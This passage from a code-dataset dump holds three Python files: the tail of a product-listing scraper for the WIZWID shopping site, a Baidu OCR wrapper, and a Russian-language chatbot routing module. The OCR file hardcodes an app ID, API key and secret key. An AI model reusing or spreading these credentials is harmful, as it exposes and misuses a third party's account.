soup.find('ul',class_='thumbCatalog clearfix')\n lis = list_box.find_all('li')\n\n if lis == []:\n return False # signal the caller that this page is empty\n for li in lis:\n try:\n img = li.find('img').attrs['src']\n brand = li.find('dd', class_=\"brand\").text.replace(\"\\n\",\"\").replace(\"\\t\",\"\").replace(\"/\",\"\").replace(\"\\\\\",\"\")\n goods = li.find('dd', class_=\"goods\").text.replace(\"\\n\",\"\").replace(\"\\t\",\"\").replace(\"/\",\"\").replace(\"\\\\\",\"\")\n price = li.find('dd', class_=\"price sales\").text.replace(\"\\n\",\"\").replace(\"\\t\",\"\")\n urllib.request.urlretrieve(img, base+\"/WIZWID/IMG{idx}_WIZWID_{brand}_{goods}.jpg\".format(idx=idx,brand=brand,goods=goods))\n crawl_list.append((goods, brand, price, img))\n # print(idx)\n idx += 1\n if idx % 50 == 0:\n # write the collected rows out to an Excel checkpoint file\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.append(['Goods name','Brand name','Price','Img URL'])\n for row in crawl_list:\n # print(row)\n sheet.append(row)\n wb.save(os.path.join(base + '/WIZWID/메이드트렌_WIZWID.xlsx'))\n print(f\"==========checkPoint: '메이드트렌_WIZWID.xlsx' has been updated==========\")\n # with open(base + '/WIZWID/메이드트렌_WIZWID.xlsx', 'wb') as f:\n # f.write(crawl_list.export('xlsx'))\n\n except KeyboardInterrupt as e:\n pass\n return idx\n\n\ndef run_wizwid_crawl():\n idx =1\n for code in code_list:\n # print(code)\n for page in range(1,10):\n print(page, \"page in progress/\")\n idx = wizwid_crawl(code, page, idx)\n if not idx:\n break\n\n # with open(os.path.join(base + '/WIZWID/메이드트렌_WIZWID.xlsx','wb')) as f :\n # f.write(crawl_list.export('xlsx'))\n\n","sub_path":"pyinstaller_crawling/WIZWID_crawler_copy.py","file_name":"WIZWID_crawler_copy.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"606623684","text":"# Use the Baidu OCR API to recognize text in images\nfrom aip import AipOcr\nfrom PIL import Image\nimport numpy as np\nimport time\nimport math\n\n\"\"\" Your APPID AK SK \"\"\"\nAPP_ID = '18889232'\nAPI_KEY = 'K5oCCe3hDPZEzx3G1GrNtSg5'\nSECRET_KEY = 'iyLIoxxzhmt3ckVZ19NqBcbKugLM9PE5'\n\n\nclass imgAnal:\n lastTime = 0\n\n # Convert the image with PIL\n def Tjpg(self, filePath):\n pil_img = Image.open(filePath)\n height, width = pil_img.size\n # convert to a pixel array\n re_img = np.asarray(pil_img)\n re_img = np.require(re_img, dtype=np.uint8, requirements=['O', 'W'])\n re_img.setflags(write=1)\n # print the original pixel array\n # print(re_img)\n # extract the alpha channel\n re_img = re_img[:, :, 3:4]\n # reshape\n re_img = re_img.reshape((height, width))\n img = Image.fromarray(re_img)\n # img.show()\n img.save(filePath.replace(\".png\", \".jpg\"))\n return\n\n def get_file_content(self, filePath):\n with open(filePath, 'rb') as fp:\n return fp.read()\n\n @staticmethod\n # round a millisecond interval up to whole seconds\n def timesqr(s_time: int) -> int:\n return math.ceil(s_time / 1000.0)\n\n # preprocess the image, then run recognition\n def rec2(self, filePath):\n self.Tjpg(filePath)\n img = self.get_file_content(filePath.replace(\".png\", \".jpg\"))\n # QPS (requests-per-second) limit\n nowTime = int(round(time.time() * 1000))\n if nowTime - imgAnal.lastTime < 600:\n time.sleep(imgAnal.timesqr(int(600 - (nowTime - imgAnal.lastTime))))\n client = AipOcr(APP_ID, API_KEY, SECRET_KEY)\n imgAnal.lastTime = nowTime\n # end\n # client.basicGeneral(img)\n res = client.basicAccurate(img)\n if len(res[\"words_result\"]) == 0:\n return filePath.split(\"/\")[-1].split(\".\")[0]\n else:\n return res[\"words_result\"][0][\"words\"]\n\n # recognize the image directly, without preprocessing\n def rec(self, filePath):\n img = self.get_file_content(filePath)\n client = AipOcr(APP_ID, API_KEY, SECRET_KEY)\n res = client.basicAccurate(img)\n if 
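# wizwid_crawl above rewrites the whole workbook every 50 rows, so a crash
# loses at most one batch of rows. The same checkpoint pattern factored into
# a helper (a sketch; the header tuple and file name are assumptions):

import openpyxl

def save_checkpoint(rows, path, header=('Goods name', 'Brand name', 'Price', 'Img URL')):
    wb = openpyxl.Workbook()
    sheet = wb.active
    sheet.append(list(header))
    for row in rows:
        sheet.append(list(row))
    wb.save(path)  # simply overwrites the previous checkpoint file

save_checkpoint([('shirt', 'BrandX', '10,000', 'http://example.com/a.jpg')],
                'checkpoint.xlsx')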
len(res[\"words_result\"]) == 0:\n return filePath.split(\"/\")[-1].split(\".\")[0]\n else:\n return res[\"words_result\"]\n\n# print(imgAnal().rec(\"source/tun2tun2.jpg\"))\n","sub_path":"imgAnal.py","file_name":"imgAnal.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"121276300","text":"import sys\n\nsys.path.append('textParsing/textKit/')\nimport findClassBeta ## Beta Version\nimport findSubject\nimport findDate\n#import genTexts\nimport commandsProcess\n\nsys.path.append('textParsing/userData/')\nfrom user import *\nfrom activeUsers import activeUsers\n\nsys.path.append('textParsing/modules/gameKit/')\nimport gameModule\nsys.path.append('textParsing/modules/absenceModule/')\nimport absenceModule\n\nsys.path.append('textParsing/faqsKit/')\nimport faqs\n\nsys.path.append('textParsing/bugReport/')\nimport bugReport\n\nfindDate = findDate.findDate()\nfindSubject = findSubject.findSubject()\nfindClass = findClassBeta.findClass()\n#govorilka = genTexts.genTexts()\nfaqs = faqs.faqs()\nbugReporter = bugReport.bugReporter()\ngameModule = gameModule.GameModule()\nabsenceModule = absenceModule.AbsenceModule()\ncommandProcess = commandsProcess.CommandsProcess(bugReporter)\n\n__speechKit__ = 'exp1'\n__classKit__ = 'Baikal 1.0 Beta'\n__textKit__ = '0.0.3'\n__gameKit__ = '0.0.4'\n__faqsKit__ = '0.0.2'\n__version__ = '0.0.4'\n__build__ = '130518/1640'\n\nprint('start')\n\n# brain.get(user_text)\n# answered => False/True\n# class => [homework, schedule, mark, commands, game, other]\n# date => [YYYYMMDD, next_week, this_week, prev_week, None]\n# subject => [taked from 'data/subjects.csv', None]\n# generatedText => string\n# quickAnswers => array of strings\n\nclass brain:\n MAX_ALLOW_SENTENCES_LEN = 52\n isActiveSpeaker = False\n\n def findAgreement(self, userText):\n yesPatterns = ['да', 'может', 'хорошо', 'ладно', 'давай', 'ок', 'окей']\n noPatterns = ['нет', 'никогда', 'нельзя', 'не']\n\n words = userText.split()\n\n for word in words:\n if (word in yesPatterns):\n return True\n if (word in noPatterns):\n return False\n \n return None\n\n def getUserModule(self, userId):\n if (activeUsers.get(userId) != None):\n return activeUsers.get(userId).activeModule\n return None\n\n def setUserModule(self, userId, moduleName):\n if (activeUsers.get(userId) != None):\n activeUsers.get(userId).activeModule = moduleName\n\n def err_max_len(self):\n return ['Я еще не научился говорить об этом']\n\n def getAnswer(self, answers, quickAnswers, userText):\n resultQuery = list()\n for answer in answers:\n curQuery = {}\n curQuery['answered'] = True\n curQuery['generatedText'] = answer\n resultQuery.append(curQuery)\n\n resultQuery[-1]['quickAnswers'] = quickAnswers\n resultQuery[-1]['agreement'] = self.findAgreement(userText)\n return resultQuery\n\n def generate_answer(self, userId, userText):\n userText = str(userText)\n userText = userText.lower()\n\n if (commandProcess.isCommand(userText)):\n return commandProcess.process(userId, userText)\n\n if (self.getUserModule(userId) == \"game\"):\n status, answer = gameModule.nextStep(userId, userText)\n if (status == 'END'):\n self.setUserModule(userId, None)\n return answer\n\n if (self.getUserModule(userId) == \"lackof\"):\n status, answer = absenceModule.nextStep(userId, userText)\n if (status == 'END'):\n self.setUserModule(userId, None)\n return answer\n\n #FAQS\n botFAQS = faqs.get(userText)\n if botFAQS != None:\n return self.getAnswer([botFAQS], None, userText)\n\n 
if (len(userText) > self.MAX_ALLOW_SENTENCES_LEN):\n botAnswer = self.err_max_len() # err_max_len already returns a list of strings\n botQuickAnswers = None\n return self.getAnswer(botAnswer, botQuickAnswers, userText)\n\n classType = findClass.get(userText)\n bugReporter.updateHistory(userId, userText, \"\", classType)\n\n if (classType == 'game' or userText == '/game'):\n activeUsers.get(userId).choosingGame()\n self.setUserModule(userId, 'game')\n return self.getAnswer([\"Выберите игру\"], None, userText)\n\n if (classType == 'lackof'):\n self.setUserModule(userId, classType)\n status, answer = absenceModule.nextStep(userId, userText)\n if (status == 'END'):\n self.setUserModule(userId, None)\n return answer\n\n if (classType == 'other'):\n # fall back to a stock reply; the text generator (govorilka) is disabled\n botAnswer = ['Я не знаю, что Вам ответить']\n if self.isActiveSpeaker:\n #botAnswer = [govorilka.get(userText)]\n pass\n botQuickAnswers = [bugReporter.botBugReportPhrase]\n bugReporter.updateHistory(userId, userText, botAnswer, classType)\n return self.getAnswer(botAnswer, botQuickAnswers, userText)\n\n curQuery = {}\n curQuery['answered'] = False\n curQuery['class'] = classType\n curQuery['date'] = findDate.get(userText)\n curQuery['subject'] = findSubject.get(userText)\n curQuery['agreement'] = self.findAgreement(userText)\n return [curQuery]\n\n\n def get(self, userId, userText):\n if (activeUsers.get(userId) == None):\n activeUsers.add(userId)\n\n if (activeUsers.get(userId).routines.get(userText) != None):\n routinesActions = activeUsers.get(userId).routines.get(userText)\n resultAnswer = list()\n for action in routinesActions:\n curAns = self.generate_answer(userId, action)\n for answer in curAns:\n resultAnswer.append(answer)\n return resultAnswer\n\n\n return self.generate_answer(userId, userText)\n","sub_path":"textParsing/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
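# generate_answer above is a chain of classType checks; with more intent
# classes a dispatch table keeps the flow flat. A self-contained sketch of
# that shape (the handlers are hypothetical stand-ins, not the real game,
# lackof, or other modules):

def _handle_game(user_id, text):
    return [{'answered': True, 'generatedText': 'Choose a game'}]

def _handle_other(user_id, text):
    return [{'answered': True, 'generatedText': 'I do not know what to answer'}]

_HANDLERS = {'game': _handle_game, 'other': _handle_other}

def dispatch(class_type, user_id, text):
    handler = _HANDLERS.get(class_type)
    if handler is None:
        # unknown intent: hand back an unanswered query, as generate_answer does
        return [{'answered': False, 'class': class_type}]
    return handler(user_id, text)

assert dispatch('game', 1, 'hi')[0]['generatedText'] == 'Choose a game'
assert dispatch('homework', 1, 'hi')[0]['answered'] is False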